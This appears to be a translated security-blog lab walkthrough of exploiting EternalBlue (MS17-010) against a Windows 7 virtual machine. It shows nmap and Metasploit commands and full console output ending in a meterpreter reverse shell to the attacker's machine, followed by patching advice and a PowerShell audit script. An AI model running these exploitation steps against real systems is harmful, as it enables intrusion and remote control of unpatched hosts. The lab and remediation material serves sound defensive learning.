
EternalBlue Vulnerability Exploitation (MS17-010)

Vulnerability description


Disclaimer: the techniques, ideas and tools covered in this article are provided solely for security-oriented learning and exchange. No one may use them for illegal purposes or for profit; anyone who does bears the consequences themselves!

When it comes to operating-system vulnerabilities, everyone has surely heard of the well-known EternalBlue (MS17-010); its outbreak stems from the birth of the WannaCry ransomware.

Reference: https://www.jianshu.com/p/4c92a9815dcc


Affected versions


Windows systems that do not have the MS17-010 patch installed.


FOFA query

Environment setup

Attacker: Kali 2021

Victim: Windows 7

Reproduction

1. Use nmap's vulnerability-scanning scripts:

nmap --script=vuln 192.168.220.130

2. Use Metasploit's MS17-010 scanner module:

# msfconsole 
/usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb:38: warning: key "Platform" is duplicated and overwritten on line 48
[!] The following modules were loaded with warnings:
[!] /usr/share/metasploit-framework/modules/post/windows/mof_ps_persist.rb
[!] Please see /root/.msf4/logs/framework.log for details.


.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.

=[ metasploit v5.0.99-dev ]
+ -- --=[ 2046 exploits - 1106 auxiliary - 345 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

[*] Starting persistent handler(s)...
msf5 > search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.220.130
rhosts => 192.168.220.130
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 192.168.220.130:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.220.130:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

3. Use Metasploit's EternalBlue exploit module:

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.220.130
rhosts => 192.168.220.130
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.220.138:4444
[*] 192.168.220.130:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.220.130:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.220.130:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.220.130:445 - Connecting to target for exploitation.
[+] 192.168.220.130:445 - Connection established for exploitation.
[+] 192.168.220.130:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.220.130:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.220.130:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.220.130:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.220.130:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.220.130:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.220.130:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.220.130:445 - Sending all but last fragment of exploit packet
[*] 192.168.220.130:445 - Starting non-paged pool grooming
[+] 192.168.220.130:445 - Sending SMBv2 buffers
[+] 192.168.220.130:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.220.130:445 - Sending final SMBv2 buffers.
[*] 192.168.220.130:445 - Sending last fragment of exploit packet!
[*] 192.168.220.130:445 - Receiving response from exploit packet
[+] 192.168.220.130:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.220.130:445 - Sending egg to corrupted connection.
[*] 192.168.220.130:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.220.130
[*] Meterpreter session 1 opened (192.168.220.138:4444 -> 192.168.220.130:51055) at 2021-12-07 02:30:09 -0500
[+] 192.168.220.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.220.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.220.130:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >


Remediation advice

The affected system versions are listed at: https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

  • Close port 445.
  • Enable the firewall and install security software.
  • Install the corresponding patch.
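As an added example (not part of the original post), the following PowerShell script audits a Windows 7 host for the three conditions the walkthrough above relied on: no MS17-010 hotfix, SMBv1 enabled, and TCP 445 listening. The KB numbers (KB4012212, KB4012215) are the ones Microsoft published for Windows 7 SP1 in MS17-010 and should be verified against the bulletin linked above; the SMB1 registry value and the netsh rule follow Microsoft's documented method for Windows 7, and the function names are my own.

```powershell
# Added example: audit a Windows 7 host against the remediation list above.
# Written for PowerShell 2.0 so it runs on the victim OS. Run from an elevated prompt.

# Hotfixes that shipped MS17-010 for Windows 7 SP1 / Server 2008 R2 (KB4012212 security-only,
# KB4012215 monthly rollup). Later cumulative rollups supersede them, so treat "none found" as
# "verify manually against the bulletin", not as proof that the host is unpatched.
$ms17010Hotfixes = @('KB4012212', 'KB4012215')

function Test-Ms17010Hotfix {
    $installed = Get-HotFix | ForEach-Object { $_.HotFixID }
    foreach ($kb in $ms17010Hotfixes) {
        if ($installed -contains $kb) { return $kb }
    }
    return $null
}

function Get-Smb1ServerState {
    # An absent SMB1 value means SMBv1 is enabled (the Windows 7 default); 0 means disabled.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $value = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).SMB1
    if ($value -eq 0) { 'Disabled' } else { 'Enabled' }
}

function Test-Port445Listening {
    # Get-NetTCPConnection does not exist on Windows 7, so parse netstat output instead.
    # Wrapping the pipeline in @() yields an empty array (Count 0) when nothing matches.
    $hits = @(netstat -ano | Select-String -Pattern ':445\s+.*LISTENING')
    return ($hits.Count -gt 0)
}

$hotfix = Test-Ms17010Hotfix
$smb1   = Get-Smb1ServerState
$port   = Test-Port445Listening

Write-Host ("MS17-010 hotfix present : {0}" -f $(if ($hotfix) { $hotfix } else { 'not found - verify manually' }))
Write-Host ("SMBv1 server            : {0}" -f $smb1)
Write-Host ("TCP 445 listening       : {0}" -f $port)

if (-not $hotfix -and $smb1 -eq 'Enabled' -and $port) {
    Write-Warning 'Unpatched, SMBv1 enabled and 445 exposed: this is the state the walkthrough above exploits.'
    Write-Host 'Remediation (the SMB1 change requires a reboot):'
    Write-Host '  Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters -Name SMB1 -Value 0 -Type DWord'
    Write-Host '  netsh advfirewall firewall add rule name="Block SMB 445" dir=in action=block protocol=TCP localport=445'
}
```

Blocking 445 at the host firewall stops the exploit path shown above but also breaks file and printer sharing, so on a server that must serve SMB the patch plus disabling SMBv1 is the fix, and the firewall rule is a stopgap.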
